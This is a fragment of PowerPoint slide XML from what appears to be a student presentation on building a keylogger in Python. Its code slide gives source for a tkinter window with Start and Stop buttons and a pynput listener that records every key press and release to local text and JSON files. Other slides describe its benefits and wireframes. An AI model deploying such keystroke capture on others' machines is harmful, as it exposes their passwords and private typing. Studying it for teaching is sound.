              <a:rPr lang="en-GB" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Real-Time Feedback Immediate Status Updates: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GUI provides immediate feedback on the status of the keylogger, which is helpful for users to know whether the logging is active or not, enhancing trust and usability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. Simplicity and Clarity in Code Readable Code:</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code is written in a clear and understandable manner, which makes it easy to follow and learn from. This is particularly valuable for beginners who are looking to understand the basics of GUI applications and event handling in python.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64" y="69545"/>
            <a:ext cx="8839200" cy="1378255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Required libraries for implementing keylogger code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1758637111"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1295400"/>
          <a:ext cx="8991600" cy="480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85445"/>
            <a:ext cx="7239000" cy="612244"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Code Implementation :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="1033955"/>
            <a:ext cx="2865778" cy="52258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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>import tkinter as tk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from tkinter import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>import json</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keys_used = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        keys.write(key)</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generate_json_file(keys_used):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        key_log.write(key_list_bytes)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on_press(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False: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{'Pressed':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flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>if flag == True: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{'Held':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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809855" y="1033956"/>
            <a:ext cx="2865778" cy="52258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800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>if flag == True: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{'Held':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on_release(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, keys_used, keys</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{'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    )</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if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</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keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    generate_text_log(str(keys))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start_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    listener.start()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1011078"/>
            <a:ext cx="2438400" cy="52373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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    listener.stop()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    stop_button.config(state='disabled’)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 = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack(side=LEFT)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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack(side=RIGHT)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root.geometry("250x250")</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root.mainloop()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472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304800" y="725375"/>
            <a:ext cx="3246755" cy="166712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Teams</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="1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wireframes</a:t>
            </a:r>
            <a:endParaRPr sz="1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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="76201"/>
            <a:ext cx="5562600" cy="629018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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28600" y="926038"/>
            <a:ext cx="8991600" cy="16647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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wireframe Explanation</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Initial State: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Guides the user to start the keylogger with a clear call-to-action.</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Starting State</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Provides real-time feedback about the keylogger’s activity, indicating that it is logging keystrokes.</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Stopped State</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Clearly informs the user that the keylogger has stopped and resets the interface for potential future use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567141" y="5105400"/>
            <a:ext cx="2655683"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Initial state</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="24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rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="-404" b="49740"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3738644" y="2824069"/>
            <a:ext cx="2410120" cy="1959692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3838280" y="5105400"/>
            <a:ext cx="2655682"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Running state</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400"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4"/>
          <a:srcRect r="-4306" b="50331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="567141" y="2813315"/>
            <a:ext cx="2503775" cy="1958738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-1" r="-1383" b="49927"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753137" y="2813314"/>
            <a:ext cx="2446515" cy="1958739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773685" y="5105400"/>
            <a:ext cx="2446515"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Stopped state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200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5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-405" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
